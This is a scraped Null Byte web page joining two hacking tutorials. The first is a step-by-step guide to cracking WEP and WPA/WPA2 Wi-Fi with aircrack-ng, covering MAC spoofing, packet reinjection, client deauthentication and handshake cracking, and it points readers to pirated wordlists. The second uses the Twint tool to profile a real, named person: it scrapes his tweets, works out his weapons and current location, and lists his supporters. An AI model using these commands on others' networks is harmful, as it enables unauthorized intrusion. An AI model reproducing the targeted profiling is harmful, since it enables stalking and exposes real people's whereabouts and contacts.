Configure ArchHow To:Stream Media to a PS3 or Xbox 360 from Mac & Linux ComputersNews:MULTIBOOT CDSecure Your Computer, Part 1:Password-Protect your BIOS Boot ScreenHow To:How Hackers Take Your Encrypted Passwords & Crack ThemHow To:Create a Custom Arch Linux DistroHow To:Use Cygwin to Run Linux Apps on WindowsHow To:Carve Saved Passwords Using CainRainbow Tables:How to Create & Use Them to Crack PasswordsHow To:Sneak into Your Roommate's Computer by Bypassing the Windows Login ScreenSecure Your Computer, Part 2:Password-Protect the GRUB Bootloader on Dual-Booted PCsHow To:Windows 7 Won't Boot? Here's How To Fix Your Master Boot RecordHow To:Make an Unbreakable Linux Password Using a SHA-2 Hash AlgorithmHow To:log on Windows 7 with username & passwordNews:Performance Hacks & Tweaks for LinuxHow To:Recover Deleted Files in LinuxNews:Windows Live SkyDriveHow To:Run a Free Web Server From Home on Windows or Linux with ApacheHow To:Encrypt your Skype Messages to Thwart Snooping Eyes Using PidginHow To:Customize Your Linux DesktopHow To:Mask Your IP Address and Remain Anonymous with OpenVPN for LinuxHow To:Avoid Root Password Reset on Kali Live USB Persistence BootNews:Cannot find windows loader after Linux install?
How Hackers Steal Your Internet & How to Defend Against It « Null Byte :: WonderHowTo
I have had a lot of people ask me, "How does my neighbor keep getting into my wireless?!". Chances are, these people are all using WEP, a deprecated wireless encryption protocol. Either that, or you are using oneweakWPA passphrase.If someone can access your wireless network that easily, this isNOTa good thing. After someone cracks an access point, possibilities are limitless. There's SSL stripping, packet sniffing, MITM (Man-In-The-Middle) attacks, ARP poisoning—not to mention being completely anonymous by using someone else's Wi-Fi.Proof of ConceptThe theory behind cracking access points is simple. For WEP, you fake authentication with the access point to get it to send you packets, then send fragments of packets back to the AP (Access Point). In return, the AP will send a torrent of packets because they're broken. On a network, if a packet is broken, they get resent. When you capture the packets, some will have initialization vectors on them. An attacker captures as many of those as they can, then cracks away at them using an algorithm. WEP is algorithmically weak—after enough IVs, you can crack any password. No matter how long. No matter how complex.WPA/2 is a little different. To crack a WPA/2 AP, you need to send a de-authentication packet to a connected client, and force it to re-authenticate. When it does this, capture the four-way handshake between them, as this contains the hash of the AP's password. This means: post handshake capture, you can do all your attacking offline.WPA/2 has the fixed a vulnerability that was in WEP and has a required password length of an 8 character minimum. This means brute-forcing is nearlyimpossible. A dictionary attack is the only way to go. Dictionaries use a pre-generated list of words, and attempts each word, one by one. These don't necessarily have to be words, butanypre-generated string of ASCII characters.In thisNull Byte, I'm going to show you how to break into your own wireless network and assess its security so you can have a impenetrable network! This will be done in Linux, because Windows does not have open-source, injection capable drivers (WinPcap and USB wireless interfaces aside). For instructions on getting packet injection capable drivers in Linux, you will find a lovely tutorial, written by me for Null Bytehere.All of the commands in bold are Terminal commands.Step1Spoofing a MAC AddressBefore anysmartcracker would attack your AP, they will always spoof their MAC (Media Access Control) address! Your MAC address is your wireless NIC's (Network Interface Card) unique identity!UNIQUE. That means if it was paid for with Mommy and Daddy's credit card, they'll know it'syoubehind the computer.To spoof a MAC address, open a terminal and use these commands:sudo ifconfig wlan0 downsudo ifconfig wlan0 hw ether 46:75:63:6b:55:21sudo ifconfig wlan0 upA frequent cracker would likely make a script out of this to do it quickly. You can put any hex number you want there for the MAC address you're spoofing to, mine is just an example.To make sure your MAC changed, you would do:ifconfigThen confirm that the "wlan0" interface matches what we put into the terminal.Step2Finding Your APTo find your AP, do a scan of local wireless APs:sudo iwlist wlan0 scanTake note of the MAC address of the access point, as well as the channel it is on, you will need it later.Step3Install Aircrack-NGInstall the aircrack-ng suite. It contains all the tools needed to assess your AP's security. In Arch Linux, it is:sudo pacman -S aircrack-ngAnd Ubuntu:sudo apt-get install aircrack-ngNow, install the aircrack-ng scripts, because sometimes you won't be able to run airmon-ng, etc. from the terminal without them:sudo pacman -S aircrack-ng-scriptsAnd Ubuntu:sudo apt-get install aircrack-ng-scriptsStep4Cracking the Wireless APNow we are going to start the actual attack on the AP. You will need to replace the text in brackets with your corresponding info, which you should have written down.Put your wireless interface into monitor mode, as this will allow it to sniff traffic:sudo airmon-ng start wlan0-OR-sudo ifconfig wlan0 mode monitorYour interface for monitoring should now be named "mon0".If you have a WEP encrpyted network, refer to "Cracking WEP" below. If you have a WPA or WPA2 network, skip this and go straight to "Cracking WPA & WPA2".Cracking WEPFor WEP encryption, we need to fake authentication with the AP so it sends you traffic (note: if you cant authenticate, spoof your MAC to match one of the clients already connected to it. You can see the under "stations" in airodump-ng). Open another tab in your terminal, and type:sudo aireplay-ng -a [AP's MAC] -e [AP's SSID(name)] mon0To start the live capture of airbourne packets:sudo airodump-ng --ivs -c [channel of AP] --bssid [AP's MAC address] -w [~/Desktop] mon0Next, you need to fake-authentication with the AP:sudo aireplay-ng -a [AP's MAC] -e [AP's ESSID(name)] mon0When you have fake-authenticated successfully, you should now start re-injecting packets:sudo aireplay-ng -3 -b [AP's MAC] -h [Your MAC] mon0When it's done, you should see it generating large amounts of traffic in the airodump-ng window. After you get 20-100,000 packets or "Data", as airodump calls them, you should be ready to crack the password.To crack your password, run this in the terminal:sudo aircrack-ng ~/Desktop/[capture file.cap]When aircrack says "KEY FOUND", copy the key and remove the semi-colons from it. Congratulations! You just proved how easy it is for someone to crack your network. With a crafted tool, an attacker can crack your network in less than 60 seconds. I've done it numerous times.Cracking WPA & WPA2To get ready to capture a four-way handshake, start airodump-ng with this command:sudo airodump-ng -c [channel of AP] --bssid [AP's MAC] -w [~/Desktop/psk.cap] mon0Now we need to de-authenticate a client to force them to reconnect and get a four-way handshake faster. Swich to airodump and look at the associated clients (look at the bottom). Copy the MAC address. It there aren't any, wait until someone connects, or try for a later date when you can have another computer connected. Here is the terminal command to force de-authentication:sudo aireplay-ng -0 15 -a [AP MAC] -c [Deauth client MAC] mon0In airodump, you should see in the top-right corner text, "WPA Handshake" and shows a MAC address following it. Example:The handshake was captured and you can now disconnect from the network. If you didn't get the handshake, you might not be close enough to the client.To crack the handshake:sudo aircrack-ng -w [~/path/to/dictionary/file.lst] [~/Desktop/psk-01.cap]You can find great dictionaries for cracking onThePirateBayorPacket Storm. I have over 20, depending on my situation. You can also use "coWPAtty", which usesRainbow Tablesto crack WPA handshakes. Rainbow Tables are pre-computed hashes with their corresponding passphrase. It'sveryeffective. TheChurch of Wi-Fihas the best Rainbow Table set I've seen. However, the torrents are impossible to find now (due to lack of seeders). In order to get them, you need to buy the DVD set.That's all there is to it. So, the bottom line is to use WPA2 with AES encryption in conjunction with an impossibly long password, like "71zJJmfbK50VgdmtjRVJuxcDJr5PVJJAAtG1mIBwbEUshkkO".Questions? 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How to Mine Twitter for Targeted Information with Twint « Null Byte :: WonderHowTo
Open-source intelligence researchers and hackers alike love social media for reconnaissance. Websites likeTwitteroffer vast, searchable databases updated in real time by millions of users, but it can be incredibly time-consuming to sift through manually. Thankfully, tools like Twint can crawl through years of Twitter data to dig up any information with a single terminal command.With researchers continually looking for new databases to plunder for juicy pieces of information, Twitter represents a wild mix of primary source information and misleading rumors. While Twitter is often discounted as a source of OSINT information for being difficult to search and parse, there are ways to get around the bottleneck that comes from the time it takes to search through and make sense of the vast sea of Twitter data.Twitter as an OSINT DatabaseThe key to creating a good plan is a good researcher. Without an understanding of a situation, it's difficult if not impossible to design a resource efficient plan. A good researcher can take a couple of essential steps to bring the pieces needed to form a plan together.First, they ask answerable questions that data can prove or disprove, and then they determine the best source of information to search for the answers. Next, they analyze the data for hidden clues or patterns, pulling in more data when necessary to build a complete understanding of the target. Last, with knowledge of the facts of the situation, the data can be transformed into actionable intelligence to support decision making and a plan of action.Don't Miss:Use the Buscador OSINT VM for Conducting Online InvestigationsThe process of defining a question, planning the collection, collecting the data, and analyzing the results is a continuous process of refining clues into understanding. Twitter supplements this mission by providing a sea of structured data to search, able to be sliced through with incredible accuracy.Data You'll Find on TwitterFor a red team using OSINT to decide on a plan of action, social media websites like Twitter can provide information not available anywhere else. Aside from the standard information released by official company accounts, Twitter also offers personal insights and observations of employees and even people in the right place at the right time.You can expect to find the following kinds of information on Twitter:Images of badges and keys.Phone numbers and personal details exchanged in public mentions.Photos and videos of the inside of office spaces and private homes.Images and videos from other people at events with different viewpoints linked by hashtags.Primary source statements about any range of topics a person may currently be under investigation for.Places a target hangs out or spends time.Company or office photos showing the identities of other employees.Records of travel and upcoming personal events.Imagine having access to a video that shows you the inside of a building you can't physically enter, the hardware configuration of a system you can't touch, or the personal interests of a potential social engineering target. These kinds of details dramatically change the course of a red team engagement by uncovering a weak link in an otherwise secure system.Don't Miss:How to Use SpiderFoot for OSINT GatheringSlicing Through Data with TwintWhile the data contained in Twitter is valuable, it can also be time-consuming to find and process. The time a tweet was posted often plays an essential factor in whether or not a tweet is useful, as well as the location, subject, and many other variables. To help researchers slice through these options quickly, Twint comes equipped with search filters that you can combine in useful ways to show precise information.Want to know every tweet a user made since last year geotagged near a specific city? Or maybe every tweet a person favorited mentioning a particular topic? With the right combination of search flags, you can even search for people publicly reaching out to exchange contact information with a targeted account.While many search tools use your Twitter account to make the requests through Twitter's API, Twint does not. This allows you to bypass rate limiting, query through proxies, and otherwise put distance between yourself and the target you're researching. With the ability to quickly generate text and CSV files to archive tweets of interest, Twint makes a great forensic or investigative Twitter tool.For more advanced users, Twint is a Python library that can be scripted to perform more custom or complex actions. The ability to script and scale Twitter searches with Twint makes it a simple but powerful way of extracting data from social media.Step 1: Install TwintTo get started with Twint, we'll download the developer version. I tried a few different installation methodsfrom its GitHub page, but I found that only one worked on the Linux system I was using. You'll need the pip package manager, which should come installed with Python3.Open a terminal window, and type the following to download and install the development version.pip3 install --upgrade -e git+ should install everything needed. If you run into problems with a pip install, you can also try using Git, although installing it this way didn't allow me to run it by typingtwintin a terminal window the way I could with pip. To install with Git, open a terminal window and type the following commands.git clone cd twint pip3 install -r requirements.txtStep 2: View Twint's OptionsOnce the required libraries finish installing, you can start Twint and see the list of available search filters by runningtwint -hin a terminal window.sudo twint -husage: python3 twint [options] TWINT - An Advanced Twitter Scraping Tool. optional arguments: -h, --help show this help message and exit -u USERNAME, --username USERNAME User's Tweets you want to scrape. -s SEARCH, --search SEARCH Search for Tweets containing this word or phrase. -g GEO, --geo GEO Search for geocoded Tweets. --near NEAR Near a specified city. --location Show user's location (Experimental). -l LANG, --lang LANG Search for Tweets in a specific language. -o OUTPUT, --output OUTPUT Save output to a file. -es ELASTICSEARCH, --elasticsearch ELASTICSEARCH Index to Elasticsearch. -t TIMEDELTA, --timedelta TIMEDELTA Time interval for every request. --year YEAR Filter Tweets before specified year. --since SINCE Filter Tweets sent since date (Example: 2017-12-27). --until UNTIL Filter Tweets sent until date (Example: 2017-12-27). --email Filter Tweets that might have email addresses --phone Filter Tweets that might have phone numbers --verified Display Tweets only from verified users (Use with -s). --csv Write as .csv file. --json Write as .json file --hashtags Output hashtags in seperate column. --userid USERID Twitter user id. --limit LIMIT Number of Tweets to pull (Increments of 20). --count Display number of Tweets scraped at the end of session. --stats Show number of replies, retweets, and likes. -db DATABASE, --database DATABASE Store Tweets in a sqlite3 database. --to TO Search Tweets to a user. --all ALL Search all Tweets associated with a user. --followers Scrape a person's followers. --following Scrape a person's follows --favorites Scrape Tweets a user has liked. --proxy-type PROXY_TYPE Socks5, HTTP, etc. --proxy-host PROXY_HOST Proxy hostname or IP. --proxy-port PROXY_PORT The port of the proxy server. --essid [ESSID] Elasticsearch Session ID, use this to differentiate scraping sessions. --userlist USERLIST Userlist from list or file. --retweets Include user's Retweets (Warning: limited). --format FORMAT Custom output format (See wiki for details). --user-full Collect all user information (Use with followers or following only). --profile-full Slow, but effective method of collecting a user's Tweets and RT. --store-pandas STORE_PANDAS Save Tweets in a DataFrame (Pandas) file. --pandas-type [PANDAS_TYPE] Specify HDF5 or Pickle (HDF5 as default) --search_name SEARCH_NAME Name for identify the search like -3dprinter stuff- only for mysql -it [INDEX_TWEETS], --index-tweets [INDEX_TWEETS] Custom Elasticsearch Index name for Tweets. -if [INDEX_FOLLOW], --index-follow [INDEX_FOLLOW] Custom Elasticsearch Index name for Follows. -iu [INDEX_USERS], --index-users [INDEX_USERS] Custom Elasticsearch Index name for Users. --debug Store information in debug logs --resume RESUME Resume from Tweet ID. --videos Display only Tweets with videos. --images Display only Tweets with images. --media Display Tweets with only images or videos. --replies Display replies to a subject. -pc PANDAS_CLEAN, --pandas-clean PANDAS_CLEAN Automatically clean Pandas dataframe at every scrape. --get-replies All replies to the tweet.Step 3: Grab a User's Recent TweetsNow that we see the ways we can slice data, we can begin pursuing an investigation. Let's say we want to track a target or begin investigating a Twitter user. For this guide, we'll pretend to be a freshly-hired IRS agent assigned to work his or her first audit. We've been handed the file of someone accused of tax evasion and are tasked with determining how best to proceed with approaching them.The name on the file of our first audit is John McAfee. After a quick search, we can see they're a Twitter user with a handle of "officialmcafee."First, we can grab information about the most recent tweets by using the-uflag for the target username and--sincefor today's date.sudo twint -u officialmcafee --since 2019-2-171096956729768767488 2019-02-16 18:17:19 PST <officialmcafee> Oh yeah!! 1096947035360636928 2019-02-16 17:38:48 PST <officialmcafee> Yes. Every last one. Every last one. 1096946784113516544 2019-02-16 17:37:48 PST <officialmcafee> I was so stoned in that photo. I remember tweeting that out . Can't recall why.Step 4: Locate Historical EvidenceJohn McAfee was in the news recently after he tweeted that he was fleeing the country, fearing the IRS was planning to indict him for tax evasion. He also tweeted at some point earlier in the year that he had not filed a tax return in a very long time.Let's locate the evidence of this tweet by using the-sflag, or subject, to look for tweets this year talking about tax returns.sudo twint -u officialmcafee -s "tax return" --since 2019-1-011080953136985133062 2019-01-03 14:24:45 PST <officialmcafee> I have not filed a tax return for 8 years. Why? 1: taxation is illegal. 2: I paid tens of millions already and received Jack Shit in services. 3. I'm done making money. I live off of cash from McAfee Inc. My net income is negative. But i am a prime target for the IRS. Here I am.Great, we have the target admitting to not filing tax returns for eight years. Assuming we were investigating this case, we'll need to collect some evidence. Did the target make any other statements regarding evading taxes? Let's collect them in a text file for later review.To do this, we'll use the-oflag to output to a text file, and a more general search for tweets about "taxes."sudo twint -u officialmcafee -s "taxes" --since 2009-01-01 -o mcafeetax1097243822143213568 2019-02-17 13:18:07 PST <officialmcafee> Yes. Income taxes are illegal. 1096836632672653312 2019-02-16 10:20:06 PST <officialmcafee> I had cataract surgery 6 months ago and bright light still hurts my eyes. I will not take them off for you my friend. And taxes are unconstitutional. I will not pay. Why the fuck do you? Where are your fucking balls? 1092592264164134913 2019-02-04 17:14:29 PST <officialmcafee> Good God woman!! We're running from the fucking tax man. Why don't we just rename our private sessions. I've always favored "Bring that God-like scepter here babe". 1091156545398804481 2019-01-31 18:09:27 PST <officialmcafee> It's all I could afford. The IRS taxed the remaining pixels. 1090719204687429634 2019-01-30 13:11:37 PST <officialmcafee> Lmfao Deal. But my $15 mil is locked up in a swiss account due to a Swiss tax assessment. If you give me the 2 mil to unlock it, I will send you the 15. Really. You can trust me. 1088992872890802178 2019-01-25 18:51:48 PST <officialmcafee> The IRS survived withoit income tax for over a hundred years. Furst showed up during the civil War 1088462380051369985 2019-01-24 07:43:48 PST <officialmcafee> tltorally wrong. . Get real. It isn't a crime not to file taxes. Grand Juries aren't convened for failure to pay taxes. And if you believe taxes are good, you have purchased our government's propaganda. You are way worse off than me. We had no taxes before the Cuvil War. 1082710638365835264 2019-01-08 10:48:26 PST <officialmcafee> Good God!!!! Educate yourself! Thr U.S. had no income tax at all, with the exception of the Civil War, until 1913. We fucking did fine. This is what Im talking about. People are buying Government propaganda and eating it up. We font need income taxes. 1082709806031368192 2019-01-08 10:45:08 PST <officialmcafee> I have paid tens of millions in taxes in the past. Dont dare talk to me abour "orher tax payers". 1081582572461834240 2019-01-05 08:05:54 PST <officialmcafee> Income taxes are unconstitutional. That's my beef. You may not mind being controlled by a corrupt givernment but i do 1081309939841286144 2019-01-04 14:02:34 PST <officialmcafee> We declared our independence from Britain and fought a bloody war to escape burdensome taxes, yet here we are, less than 250 years later, being burdened by income taxes that are more crushing than anythung rhe British dreamed of. Free yourselves people! … 1081122728005066752 2019-01-04 01:38:39 PST <officialmcafee> Fox News reported that i don't pay taxes. The IRS is angry (and corrupt). They will strike using law, twisted by 'their' facts, as a club. My offense is small and won't do. inferences of conspiracy or foreign collusion, or something, will come. I promise. … 1081019828658495488 2019-01-03 18:49:46 PST <officialmcafee> We had no income tax in the U.S. prior to the Civil War. There are uncountable alternativrs. Look it up and educate yourself. 1081017561695903744 2019-01-03 18:40:45 PST <officialmcafee> No sir. We had no income taxes prior to the Civil War and yet we were a world powet. There are thousands of ways to fund a givernment besides income taxes. Pay for service is one way: pay for road use by mileage, pay to access National parks, etc., 1080988662077247488 2019-01-03 16:45:55 PST <officialmcafee> My Crypto goals drive the IRS mad. Privacy coins will obsolete income taxes. Can't tax money you cant see, and I promote this as a good thing. The SEC is legally failing in their power grab so It's up to the IRS now to silence me. I've called them out. They will come. You'll see. 1080953136985133062 2019-01-03 14:24:45 PST <officialmcafee> I have not filed a tax return for 8 years. Why? 1: taxation is illegal. 2: I paid tens of millions already and received Jack Shit in services. 3. I'm done making money. I live off of cash from McAfee Inc. My net income is negative. But i am a prime target for the IRS. Here I am. 1080854344331939840 2019-01-03 07:52:11 PST <officialmcafee> I'm done trashing the SEC. Let's move on  to the IRS - the agency that takes from you an average of three months of your labor each year. First - taxation is theft. It is unconstitutional. Prior to the civil war there was no income tax, yet we managed. Stay tuned for the truth. 1071899943680512001 2018-12-09 14:50:36 PST <officialmcafee> And that does'n happen to me constantly??? But ask-- who do the Feds work for? Me, as much as anybody since I've paid the Feds, through taxes, hundreds of millions of dollars for services I have never received. Every Fed burstung through the door will get a "Past Due" notice 1033463922735624193 2018-08-25 14:19:34 PST <officialmcafee> I have made enough in my lifetime to have paid over a quarter of a billion dollars in taxes. I do not have to account for my money anymore. Some of the dollars I spend, are from the millions I made in 1987, never mind the hundreds of millions over the subsequent 10 years. 997495042347622400 2018-05-18 08:12:05 PST <officialmcafee> The SEC created a fake ICO called the Howeycoin, where the "Buy" button takes you to a page which discourages the purchase of cryptocurrencies. This is where your tax dollars are going - into deception, subterfuge and a desperate attempt to save the SEC.  951689398135001089 2018-01-11 21:36:48 PST <officialmcafee> Tax writeoffs. 947326031890911233 2017-12-30 20:38:21 PST <officialmcafee> When I follow someone, God gives them a new Bentley Azure. Tax free. 947325176701706241 2017-12-30 20:34:57 PST <officialmcafee> When I follow someone God himself comes down and gives them a Bentley Azure. Tax free. It used to be Ford Focus. Don't know why the upgrade. 947007111011151872 2017-12-29 23:31:04 PST <officialmcafee> As I said earlier ..... When I follow someone God himself comes down and gives them a new Bentley Azure ..... Tax free. 947005611253919744 2017-12-29 23:25:06 PST <officialmcafee> I did. But I don't believe your name is Tom. You realize, of course, that when I follow people, God himself comes down and blesses them - giving each of them a Bentley Azure - tax free. 939924816664121345 2017-12-10 10:28:33 PST <officialmcafee> Good God! Do I have to spell it out? Well ... No taxes, no regulatory problems, no traceable income, no tax accountant costs, etc,etc,etc 644436140183973888 2015-09-17 02:02:03 PST <officialmcafee> My policies now posted  #ForeignPolicy #drugs #immigrants #tax #educate #economy #cyber +more, wow. He really hates taxes. We now have a file called "mcafeetax" containing all the tweets we just scraped about taxes. If I were a law enforcement agency, I might be curious if I could talk to the target or if he might be a heavily armed loose cannon. Maybe Twitter can answer that question!Step 5: Export Evidence & MetadataLet's see if we can identify any tweets about guns in the past year. In fact, let's try to find an image of the target mentioning "gun" somewhere in the post.To do this, we'll add a--mediaflag to say we only want to see posts containing media like photos or video. Next, we'll save the evidence we find to a CSV file called "mcafeeguns."sudo twint -u officialmcafee -s "gun" --since 2018-01-01 --media -o mcafeeguns --csv1071009885645627392 2018-12-07 03:53:49 PST <officialmcafee> U jumped the gun when I divulged the Skycoin video that someone shot during the week of revelry at my place. Seems there is a remix now. Great improvements plus without the shot of Hayden with his dick hanging out. (link: )  1022223220861272067 2018-07-25 13:53:02 PST <officialmcafee> ANTI-GUN FOLK: READ NO FURTHER. Now -- guns don't kill people. Bullets kill people. And if you want to kill people with a handgun, no bullet beats the FN-57. High velocity, flat trajectory, tumbles on impact, making massive exit wounds. I urge all all if my security to use it. 1007413614205120512 2018-06-14 17:04:57 PST <officialmcafee> This look like a water gun? 1000389938200895489 2018-05-26 07:55:22 PST <officialmcafee> About my guns 999482149190492160 2018-05-23 19:48:08 PST <officialmcafee> Bull shit. When am I not holding guns or surrounded by guards 999480884003786752 2018-05-23 19:43:06 PST <officialmcafee> When am I not in a photo with guns and guards? 971322857363005440 2018-03-07 01:53:10 PST <officialmcafee> You ask -- Why do I have guns? Dateline: Amy confesses to trying to kill me: … Newsweek: Wife confesses to cooperating with Cartel: … USA Today: War with Cartel: … Google: Tons of stories. Any questions? 965249086562734080 2018-02-18 07:38:10 PST <officialmcafee> People asked why I have guns in the corner of my previous post. Anyone want to explain why we have the right to bear arms in America? the CSV file I produced, I also have access to lots of metadata about each post.I can see that each image I found is also extracted. Clicking on one, I can immediately see that yes, the target is indeed well armed.There are a lot more images of guns but one, in particular, might be of interest during an investigation. In another "gun" tagged photo from this year, the target is holding a5.7×28mmammunition cartridge in front of anFN Five-sevenpistol.This particular handgun is an unusual model designed to defeat modern soft body armor, relying on special armor-piercing bullets fired at a very high rate. They are often hard to find because they are banned from being imported. The round the subject is holding is marked with a black tip, which marks it as armor-piercing ammunition designed to penetrate body armor.Image by officialmcafee/TwitterThe SS190 bullet has a steel penetrator and aluminum core, meaning any law enforcement agent trying to approach the suspect shouldn't rely on soft body armor for safety. With a single search through Twint, we've determined not only that the suspect is armed, but that he also has access to special types of ammunition.Step 6: Collect Real-Time DataTwint has the advantage of being able to pull information about current events that Twitter users are reporting on. By combining the geolocation and subject flags, we can specify we only want to see posts about certain subjects in our local area that are happening now.Don't Miss:Research a Person or Organization Using the Operative FrameworkLet's say we hear police raid down the street and want more information. We can search for posts tagged near Los Angeles, for example, searching for keywords like "arrested" or "LAPD" to locate images of events in progress.sudo twint --verified -s "arrested" --near 'Los Angeles' --since 2019-02-17 --images1097368136293208064 2019-02-17 21:32:06 PST <KTLAMorningNews> Suspected DUI Driver Arrested in Deadly Hit-and-Run Crash in South-Central L.A. Caught on Video 1097353829375463425 2019-02-17 20:35:15 PST <KTLA> Yucaipa Father Arrested in Death of 6-Month-Old Baby Girl we want to search for video evidence instead, we can modify the command to search for that type of content as well. Here, a search for mentions of "LAPD" yields a video showing the end of a recent fatal police pursuit.sudo twint --verified -s "LAPD" --near 'Los Angeles' --since 2019-02-17 --videos1097300577447378944 2019-02-17 17:03:39 PST <KevinTakumi> Fatal #crash #Chatsworth LAFD/LAPD on scene 2 car crash DeSoto/Plummer 2 transported to hospital 2 dead on scene, investigation ongoing long term @FOXLA 1097264275586871296 2019-02-17 14:39:24 PST <LAPDHQ> Our city might not be perfect, but it has life — it has culture. It’s our privilege to be able to serve and protect the City of Angels., let's apply the ability to pull in live data to our search. Who are this person's supporters? Let's create a CSV file of everyone who has tweeted to this account using the--toflag, so we can review it for people possibly offering aid or giving other clues about encountering the target in person by tweeting a photo or greeting.sudo twint --to officialmcafee --since 2019-01-01 -s help -o mcafeecontacts --csv1097503235684864000 2019-02-18 06:28:56 PST <FlyCryptoGuy> Which side defends the bees? Bees die, man dies. Why don't you support #Buzzcoin bro? Help mankind. Save the damn bees. It's easy to throw insults, start throwing solutions. Thank you sir. 1097356068164898816 2019-02-17 20:44:09 PST <SkepticalMinded> Well said, the labels that hold people back as a true progressive society, are the same labels that help those same people feel belonged and validated. So in other words fuck what people think and be yourself. 1097280716466020353 2019-02-17 15:44:43 PST <BitcoinGhost1> I'm in Germany, put me in mind and I'll be ready to help.Opening the CSV file, we can see it is full of recent replies to the target, many offering support.Great, so far our investigation shows the target is a heavily armed, unrepentant tax-evader with many supporters — good news for any law enforcement agency.Step 7: Dig Deeper with Additional SearchesLet's say we now want to learn any clues about how the target has been hiding his money before announcing his tax evasion.Because the subject has made many statements about taxes since the story broke, we only want to find statements made before that period using the--yearflag. We're interested in the keywords "taxes" or "tax," so we can construct a Twint search for any post talking about taxes posted before 2018 with the following command.sudo twint -u officialmcafee -s taxes --year 2018947326031890911233 2017-12-30 20:38:21 PST <officialmcafee> When I follow someone, God gives them a new Bentley Azure. Tax free. 947325176701706241 2017-12-30 20:34:57 PST <officialmcafee> When I follow someone God himself comes down and gives them a Bentley Azure. Tax free. It used to be Ford Focus. Don't know why the upgrade. 947007111011151872 2017-12-29 23:31:04 PST <officialmcafee> As I said earlier ..... When I follow someone God himself comes down and gives them a new Bentley Azure ..... Tax free. 947005611253919744 2017-12-29 23:25:06 PST <officialmcafee> I did. But I don't believe your name is Tom. You realize, of course, that when I follow people, God himself comes down and blesses them - giving each of them a Bentley Azure - tax free. 939924816664121345 2017-12-10 10:28:33 PST <officialmcafee> Good God! Do I have to spell it out? Well ... No taxes, no regulatory problems, no traceable income, no tax accountant costs, etc,etc,etc 644436140183973888 2015-09-17 02:02:03 PST <officialmcafee> My policies now posted  #ForeignPolicy #drugs #immigrants #tax #educate #economy #cyber +more seems like the target has made statements about hiding money in cryptocurrency.Knowing the suspect is now on the run, we can run a search for anyone publically tweeting to the target and offering support. To do this, we'll look for people tweeting to the target with the--toflag and search for tweets likely containing contact information with the--phoneflag.We can also try to find where he is by searching for photos or video they may have posted of their whereabouts in the last week. Using the--locationflag to specify only location-tagged tweets, we can pull any tweets containing media that might let us see where the target is from the last week.sudo twint -u officialmcafee --location --since 2019-2-10 --media1096942869091356674 2019-02-16 17:22:14 PST <officialmcafee> | Location House McAfee 1096932395012554754 2019-02-16 16:40:37 PST <officialmcafee> Back at the third floor of the "compound". We are just mellowing out after a day of speeding between islands in my first test of our tender (Moored alongside) | Location House McAfee 1096929852056395776 2019-02-16 16:30:31 PST <officialmcafee> Here is the third floor of our "Compound" right now. The "dingy" is moored alongside. | Location House McAfee 1096915137087320064 2019-02-16 15:32:03 PST <officialmcafee> A boring video. But Rick took it. He's proud of it. He asked me to tweet it. I just did. He is outside of social media however, so I can dis him in this (for him) alternate universe, while I truly love him in that universe which, for me at this moment time, is alternate. | Location House McAfee 1096635092393517056 2019-02-15 20:59:15 PST <officialmcafee> Rick caught me with my harmonica attempting to regain favor with IT guy. He was way out of my league. | Location House McAfee 1096614989857738752 2019-02-15 19:39:22 PST <officialmcafee> Holy FUCK!!! My Bahamian IT guy -- whom I judged to be the dweebyest person on earth -- shows up in the band I hired for Choppy's bar for the weekend. People -- never judge. The IT guy is the sax player. | Location House McAfeeOne of the first results is a video of the target steering a boat through a chain of islands. In another tweet the day before, the target films himself at a bar in Georgetown, a city in the Bahamas. Based on media posted on Twitter in the past two days, the target is on a boat off the coast of Georgetown in the Bahamas.Twitter Makes OSINT EasyIn our scenario, as a junior IRS agent learning about the subject of their first audit, we discovered our target is a heavily armed tax evader marauding around the islands of the Carribean with armor-piercing weapons. Rather than try approaching the offender ourselves, it's much more likely we'd take advantage of the extradition treaty that went into effect between the Bahamas and the United States on Sept. 22, 1994, and make apprehending the target someone else's problem.Don't Miss:Use Facial Recognition for OSINT Analysis on People & CompaniesRegardless of the type of investigation, data from social media can enrich your understanding of an event by providing a seemingly endless stream of information. From studying the interactions between users to finding alternative views of the same situation through media organized by hashtags, information shared on social media should be a part of any OSINT investigator's toolkit.I hope you enjoyed this guide to using Twitter as a source of OSINT information with Twint! If you have any questions about this tutorial on Twitter OSINT, leave a comment below, and feel free to reach me on [email protected]'t Miss:Uncover Hidden Subdomains to Reveal Internal Services with CT-ExposerFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by Kody/Null ByteRelatedNews:WhatsApp Is Now Sharing Your Data with Facebook, but Opting Out Doesn't Solve the ProblemNews:Glowing Bacteria Can Help Locate Devastating Hidden Land MinesRecon:How to Research a Person or Organization Using the Operative FrameworkHow To:Conduct Recon on a Web Target with Python ToolsNews:How Google Forcing Apps to Target Oreo Will Help with Android's Malware ProblemVideo:How to Use Maltego to Research & Mine Data Like an AnalystHow To:Track Down a Tinder Profile with Location Spoofing on Google ChromeHow To:Use Maltego to Fingerprint an Entire Network Using Only a Domain NameHow To:Catch an Internet Catfish with Grabify Tracking LinksNews:Augmented Reality Turns Rock Climbing into a Real-World Video GameHow To:Scrape Target Email Addresses with TheHarvesterHow To:Use Maltego to Monitor Twitter for Disinformation CampaignsHow To:Use Photon Scanner to Scrape Web OSINT DataHow To:Use Maltego to Target Company Email Addresses That May Be Vulnerable from Third-Party BreachesAdvanced Phishing:How to Inject Meetings into Anyone's Google CalendarHow To:Hack Your Firefox User Agent to Spoof Your OS and BrowserHow To:Identify Antivirus Software Installed on a Target's Windows 10 PCHow To:Here's How Your Apps Will Get Better Now That They Have to Target OreoHow To:Gathering Sensitive Information: Scouting Media Profiles for Target InformationHow To:Quickly Gather Target Information with Metasploit Post ModulesHow To:Conduct OSINT Recon on a Target Domain with Raccoon ScannerHacking macOS:How to Perform Situational Awareness Attacks, Part 1 (Using System Profiler & ARP)Hack Like a Pro:How to Use Maltego to Do Network ReconnaissanceHow To:Exploit EternalBlue on Windows Server with MetasploitHow To:Check if Your Apps Are Targeting OreoNews:Target Focuses on Mobile Web Rather Than App for AR Shopping ToolNews:Safari to Block Third-Party Tracking & AutoplayHow To:Gathering Sensitive Information: 